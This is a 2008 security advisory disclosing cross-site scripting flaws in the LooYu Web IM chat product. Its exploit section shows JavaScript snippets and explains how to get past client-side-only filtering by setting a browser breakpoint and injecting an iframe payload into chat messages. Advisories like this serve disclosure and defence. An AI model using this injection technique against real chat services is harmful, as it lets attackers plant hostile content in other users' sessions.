looyu-xss.txt

`Application: LooYu Web IM  
Vendor: www.looyu.com  
Corporation: DuoYou, Inc.  
Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional  
Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities  
  
Background:  
==============  
LooYu is a web-based group chat tool that lets invite a client,  
colleague, or vendor to chat, and collaborate.  
  
Vulnerability:  
==============  
They do not properly sanitize the potentially malicious input content  
to be rendered and, as a result, an attacker might provide malicious  
HTML content as part of an IM message. There is a client-side only  
input validation.  
  
Exploit:  
==============  
1. newVisitorChat.js  
  
(1)function sendMessage() {  
..................  
..................  
save_message(replaceHtml(msg));  
}  
  
(2)function save_message(msg) {  
var m = msg; //BREAKPOINT  
for(var e in emots){  
if(m.indexOf(e)!=-1){   
m = m.replace(e,emots[e]);   
}  
  
}  
addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor",null,'send');  
..................  
..................  
}  
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:  
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"  
  
  
2. newCusChat.js  
  
(1)function sendMessage() {  
..................  
..................  
save_message(replaceHtml(msg));  
..................  
..................  
}  
  
(2)function saveMessage(msg) {  
showLocalMessage(msg);  
Chat.addMessage(companyId,currentVisitor.chatId,customerId,currentVisitor.getTar(),  
msg,{callback:function(m){  
save_message_do(currentVisitor,m); //BREAKPOINT  
}});  
}  
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:  
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"  
  
=========================  
xisigr[topsec]  
[email protected]  
  
  
  
--   
----xisigr----  
`